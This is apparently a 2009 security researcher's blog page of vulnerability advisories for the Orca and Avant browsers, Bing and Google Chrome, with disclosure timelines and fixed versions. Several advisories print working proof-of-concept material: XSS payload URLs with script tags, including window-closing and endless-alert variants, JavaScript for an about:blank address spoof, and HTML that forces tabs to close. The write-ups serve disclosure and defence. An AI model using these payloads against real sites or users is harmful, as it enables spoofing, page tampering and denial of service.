Orca Browser browser:home Persistent XSS vulnerability

Friday, July 31, 2009
###########################################
Orca Browser browser:home Persistent XSS vulnerability
vendor url: http://www.orcabrowser.com/
Advisore: http://lostmon.blogspot.com/2009/07/
orca-browser-browserhome-persistent-xss.html
vendor notify: NO exploit available: yes
############################################

#############
description
#############

Orca Browser´s user-friendly interface brings a new level
of clarity and efficiency to your browsing experience,and
frequent upgrades have steadily improved its reliability.
Avant Browser is freeware That's right. 100% Free!.

Orca Browser contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate properly the url links upon submission to the
bookmarks in browser:home page.
This could allow a user to create a specially crafted URL or a
bookmark that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server
wen try to load browser:home ,leading to a loss of integrity.

###############
version tested
###############

Avant Browser 1.2 build 2

#########
solution:
##########

Update to version 1.2. build 3
this version address this vulnerability.


#############
timeline:
#############

discovered: 23-jul-2009
disclosure: 30 jul 2009

##################
testing
##################

Demostration Video => http://www.spymac.com/details/?2417793

Open Orca Browser and by default the browser load
'browser:home' page. in this page we can view tree
columns , 1 top sites 2 history and 3 recent bookmarks.

Bookmarks column is vulnerable to a xss. let´s go
to demostrate.
I make a web page posible vulnerable to a xss condition

<?
$cmd=$_GET[id]
?>

I place a online doc for demo here =>
http://usuarios.lycos.es/reyfuss/id.php?id=

open Orca browser and navigate to

http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
click in bookmark Tool bar and click in new bookmark and add this url.

Load browser:home or close and open the browser , the script
is executed in bookmarks column.


################ End #####################

thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
atentamente:
--
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...

Avant Browser browser:home Persistent XSS vulnerabilities

Thursday, July 30, 2009
###########################################
Avant Browser browser:home Persistent XSS vulnerabilities
vendor url: http://www.avantbrowser.com/
Advisore: http://lostmon.blogspot.com/2009/07/
avant-browser-browserhome-persistent.html
vendor notify: NO exploit available: yes
############################################

#############
description
#############

Avant Browser´s user-friendly interface brings a new level
of clarity and efficiency to your browsing experience,and
frequent upgrades have steadily improved its reliability.
Avant Browser is freeware That's right. 100% Free!.

Avant Browse contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate properly the url links upon submission to the
history, bookmarks and top sites visited in browser:home page.
This could allow a user to create a specially crafted URL or a
bookmark that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server
wen try to load browser:home ,leading to a loss of integrity.

###############
version tested
###############

Avant Browser 11.7 build 35

#########
solution:
##########

Update to version 11.7 build 36
it is reported and tested that isn´t
vulnerable.


#############
timeline:
#############

discovered: 23-jul-2009
disclosure: 30 jul 2009

##################
testing
##################

Demostration Video => http://www.spymac.com/details/?2417793
Open Avant Browser and by default the browser load
'browser:home' page. in this page we can view tree
columns , 1 top sites 2 history and 3 recent bookmarks.

All tree colums are prone vulnerables to a xss let´s go
to demostrate it in the tree cases.
I make a web page posible vulnerable to a xss condition

<?
$cmd=$_GET[id]
?>

I place a online doc for demo here =>
http://usuarios.lycos.es/reyfuss/id.php?id=

open avant browser and navigate to
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>
wait until load , and them close the browser
or open Browser:home URI.

The script is executed and we have two columns afected,
the first and the second.

go to tools menu and delete history ...

open avant browser and go to
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>

rigth click and select add bookmark and add it.

load again browser:home and the xss is executed
in bookmarks column.

So if we for example like to deny the access to
browser:home we can load =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>window.close()</script>
and wen open the broser and load browser:home on load,
the script close it.

so if we like to denial the service we can load =>
http://usuarios.lycos.es/reyfuss/id.php?id="><script>while(1)alert(1)</script>

################ End #####################

thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
atentamente:
--
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...

Bing.com Search engine, cache.aspx XSS

Wednesday, July 29, 2009
###########################################
Bing.com Search engine, cache.aspx XSS
vendor url:http://ww.bing.com
advisore:http://lostmon.blogspot.com/2009/07/
bingcom-search-engine-cacheaspx-xss.html
vendor notify: yes vendor confirmed:yes
###########################################

Bing search engine contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does not
validate properly 'q' variable upon submission to the 'cache.aspx'
script.This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,leading to
a loss of integrity.





#########
solution:
##########

No Solution At this Time.
but microsoft planing to patch it
in the new release code from bing.

#############
timeline:
#############

discovered: 08-jun-2009
vendor notified: 11 jun 2009
vendor response: 11 jun 2009
vendor last response: 30 jun 2009
disclosure: 29 jul 2009


################ End #####################

thnx to estrella to be my ligth
thnx to Brink he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...

Google Chrome About:blank spoof

Tuesday, July 28, 2009
#######################################
Google Chrome About:blank spoof
vendor url:www.google.com
advisore:http://lostmon.blogspot.com/2009/07/
google-chrome-aboutblank-spoof.html

vendor nbotify:YES exploit avalilable:YES
########################################

issue :=>http://code.google.com/p/chromium/issues/detail?id=17876


Chrome Version :2.0.172.37 (Build oficial )
URLs (if applicable) :
Other browsers tested:
Add OK or FAIL after other browsers where you have tested this issue:
Safari 4: FAIL
Firefox 3.x: FAIL
IE 7: OK
IE 8: OK

What steps will reproduce the problem?
1.Open The exploit page
2.click in the link
3.look about:blank page

What is the expected result?
show a error page or search in google

What happens instead?

Write in About:blank Page


Please provide any additional information below. Attach a screenshot if
possible.

########################
Sample code
########################

</script>

<center>
<h1>Chrome about:blank Spoof</h1>
</center>

This vulnerability is based on http://www.securityfocus.com/bid/35829/ and
http://www.securityfocus.com/bid/35803
by Juan Pablo Lopez Yacubian and Michael Wood.

<p>
<a href='javascript:spoof()'><<h2>test Spoof !!</h2></a>
<p>


<script>
function spoof()
{

a = window.open('http://www.example.com%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,')
a.document.write('<H1>FAKE PAGE<\h1>')
a.document.write('<title>test</title>')
a.stop ();
}
</script>
####################€nd#####################
thank to all Lostmon groups team
Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Acknowledgments from Microsoft online services.

Wednesday, July 08, 2009
Security Researcher Acknowledgments
for Microsoft Online Services

The Microsoft Security Response Center (MSRC) is pleased to recognize the security researchers who have helped make Microsoft online services safer by finding and reporting security vulnerabilities. Each name listed represents an individual or company who has responsibly disclosed one or more security vulnerabilities in our online services and worked with us to remediate the issue.
http://technet.microsoft.com/en-us/security/cc308575.aspx#0609

June 2009 Security Researchers

  • Blue Moon Consulting
    bluemoon.com.vn

  • Lostmon Lords
    lostmon.blogspot.com

  • Security Team
    dongabank.com.vn

  • Nenad Vijatov
    blog.vijatov.com

--

thank to all Lostmon groups team
Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Google Chrome close() issue

Tuesday, July 07, 2009
##############################
Google Chrome close() issue
VENDOR: http://www.google.com/chrome/
article =http://lostmon.blogspot.com/
2009/07/google-chrome-close-issue.html
##############################

Chrome Version : 2.0.172.33 (Build oficial )
URLs (if applicable) :
Other browsers tested:
Safari 4: OK
Firefox 3.x:OK
IE 7: OK
IE 8: OK

What steps will reproduce the problem?

1 - open a web page
2 - navigate to ther page.

Google chrome automatic closes the tab and if we have
only one tab , it closes the process chrome.

What is the expected result?

google chrome don´t close or prompt for close.

What happens instead?

Google chrome closes the tab or if we have only
one tab it closse too without any confirmation.

###########
Abstract
###########

for test all of this need a instaled web server,
and some patience XDD

#############
tesst 1
#############

Create a new html document and write in:

<html><body onload='close()'></body></html>
save it as test1.html in c:\test\ for testing.

1.1 - Open google Chrome and open it with file handler like
file:///c:/test/test1.html
Chrome does not close the window and nothing apears...

1.2 - Open The file in a trust intranet zone via
htttp://localhost/test/test1.html or via ip
http://192.168.1.100/test/test1.html
Chrome does not close the window and nothing apears...


1.3 - Open hard disk and select c:\test\test1.html rigth
click and open with Google Chrome.
Chrome open and close auth.

if we change to other even like onblur ,with onfocus event
it´s interesting because if we try to use inspector to view
the source code, we click in body tag , and we close inspector
the tab is close too,this only aparently afects,wen we open the
html document with test mode 1.3

so this issue aparently can´t exploit in a remote scenario.

###############
test 2
###############

create a new html file and wirte inside , and save it as
test2.html in the test folder.

<html>

<head></head>
<title>.:[-Google Chrome close() issue PoC By Lostmon-]:.</title>
<body>
<script>
try { CloseCrome(); } catch(e) {
setTimeout("location.reload();",20);
close(); }
</script>
<h2>.:[-Google Chrome close() issue PoC By Lostmon-]:.</h2>

<p>Google Chrome :2.0.172.33 (Build oficial )<br>
WebKit 530.5<br>V8 1.1.10.13<br>
User Agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br>
AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5</p>
</body>

</html>

2.1 - Open it via file protocol handler file:///c:/test/test2.html ,
Chrome does not close the window and nothing aparently apears.
but if we try to navigate to other site like www.google.com
the tab closes auth.

2.2 - Open it in trust web server http://localhost/test/test2.html ,
or http://192.168.1.100/test/test2.html Chrome does not close
the window and nothing aparently apears ;but if we try to navigate
to other site like www.google.com the tab closes auth.

2.3 - Open hard disk and select c:\test\test2.html rigth
click and open with Google Chrome.
Chrome open and close auth.

##############
conclusion
##############

This issue can be a vulnerability , and this can be used for
example to built malwares that can be tramp the browser in a
determinate location and if the user try to look the code
(onfocus)or try to navigate to other site (test2.html)or other
event,the window can close without interaction,them if a
malware or a malicious web page or a browser hijacker can
load as a default web page and them this can be a
Denial Of Service Condition


atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...